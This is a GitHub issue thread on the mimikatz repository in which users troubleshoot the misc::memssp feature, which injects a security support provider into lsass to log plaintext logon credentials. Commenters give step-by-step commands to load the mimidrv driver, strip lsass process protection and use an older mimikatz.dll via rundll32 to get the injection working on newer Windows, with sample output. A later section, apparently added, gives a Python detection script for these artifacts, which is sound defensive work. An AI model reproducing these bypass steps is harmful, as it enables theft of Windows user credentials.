gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz

misc::memssp don't work anymore #261

Open Slackerok opened 4 years ago

Slackerok commented 4 years ago

Greetings. On the updated W10 and WServer2019, this feature "misc::memssp" no longer works. After its launch, Windows goes into reboot immediately. It says that there is a problem and it needs to reboot. Tested on more computers. In general, can it be fixed somehow?

Papotito123 commented 4 years ago

Hello. Try this: run mimikatz, then run:

privilege::debug

!+

!processprotect /process:lsass.exe /remove

Then run misc::memssp.

But AFAIK, from Windows 10 Anniversary, lsass.exe will not keep the user password in plain text. So the whole process can be good but the password will be blank/null. Also, Windows Defender will try to keep the lsass.exe process safe.

Slackerok commented 4 years ago

No, it doesn't work. This situation has recently become blocked. I always removed protection from the process with the command: !processprotect /process:lsass.exe /remove. Well, the Defender is naturally off.

Papotito123 commented 4 years ago

Hello. This is my output. But I have Windows NT 10.0 build 17763 (arch x64) msvc 150030729 207, that is, Win 10 1809.

      .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
      '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

    mimikatz(commandline) # version

    mimikatz 2.2.0 (arch x64)
    Windows NT 10.0 build 17763 (arch x64)
    msvc 150030729 207

    mimikatz(commandline) # privilege::debug
    Privilege '20' OK

    mimikatz(commandline) # !+
    [*] 'mimidrv' service not present
    [+] 'mimidrv' service successfully registered
    [+] 'mimidrv' service ACL to everyone
    [+] 'mimidrv' service started

    mimikatz(commandline) # misc::memssp
    Injected =)

    mimikatz(commandline) # exit
    Bye!

Papotito123 commented 4 years ago

mimikatz-dll.zip

Hello. It has been a long time. I installed Win10 2004 19041.450 x64 (August 2020) and tested misc::memssp. At first it runs and says "injected" but doesn't create mimilsa.log in System32. But I got it to work.

From some older mimikatz, grab the file mimikatz.dll. Put it in the same folder as mimikatz.exe. Open a cmd (as admin) and run mimikatz as usual.

Type: privilege::debug

Type: misc::cmd (this will open a new cmd)

Type: rundll32 "path-to-mimikatz.dll", main (this will open a new mimikatz cmd window)

Type: misc::memssp

Should work now.
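From the defender's side, the artifacts named in this thread (the 'mimidrv' service, rundll32 loading mimikatz.dll, and mimilsa.log in System32) can be matched in Windows telemetry. The following is an added example, not part of the thread or of mimikatz: it assumes events already normalized into dicts with hypothetical `host`, `channel` and `id` keys plus the Service Control Manager 7045 and Sysmon 1/11 field names, and all sample events are constructed.

```python
import re
from collections import defaultdict

# (rule name, log channel, event id, field to inspect, pattern).
# Indicators come from the thread: the 'mimidrv' service, mimilsa.log in
# System32, rundll32 loading mimikatz.dll, and the command names used.
RULES = [
    ("mimidrv_service", "System", 7045, "ServiceName", re.compile(r"^mimidrv$", re.I)),
    ("mimilsa_log", "Sysmon", 11, "TargetFilename",
     re.compile(r"\\system32\\mimilsa\.log$", re.I)),
    ("rundll32_mimikatz_dll", "Sysmon", 1, "CommandLine",
     re.compile(r"rundll32(\.exe)?\b.*mimikatz\.dll", re.I)),
    ("memssp_command", "Sysmon", 1, "CommandLine",
     re.compile(r"misc::memssp|!processprotect\b.*lsass", re.I)),
]

# Constructed sample data (assumed normalized shape), not real logs.
SAMPLE_EVENTS = [
    {"host": "WS01", "channel": "System", "id": 7045, "ServiceName": "mimidrv"},
    {"host": "WS01", "channel": "Sysmon", "id": 1,
     "CommandLine": r'rundll32 "C:\Tools\mimikatz.dll", main'},
    {"host": "WS01", "channel": "Sysmon", "id": 11,
     "TargetFilename": r"C:\Windows\System32\mimilsa.log"},
    {"host": "WS02", "channel": "Sysmon", "id": 1,
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"host": "WS03", "channel": "System", "id": 7045, "ServiceName": "mimidrv"},
]

def match_event(event):
    """Return the names of all rules that fire on one normalized event."""
    return [name for name, channel, eid, field, rx in RULES
            if event.get("channel") == channel and event.get("id") == eid
            and rx.search(str(event.get(field, "")))]

def triage(events):
    """Group hits per host; a written mimilsa.log or 2+ indicators is high."""
    hits = defaultdict(set)
    for ev in events:
        for name in match_event(ev):
            hits[ev["host"]].add(name)
    return {host: {"hits": sorted(names),
                   "severity": "high" if "mimilsa_log" in names or len(names) >= 2
                   else "medium"}
            for host, names in hits.items()}

if __name__ == "__main__":
    for host, result in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, result["severity"], ", ".join(result["hits"]))
```

Matching on fixed names only catches unmodified builds, so treat a hit as high-confidence and a miss as inconclusive.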

Papotito123 commented 4 years ago

Hello @Slackerok, did you try my method, and did it work?

Thanks.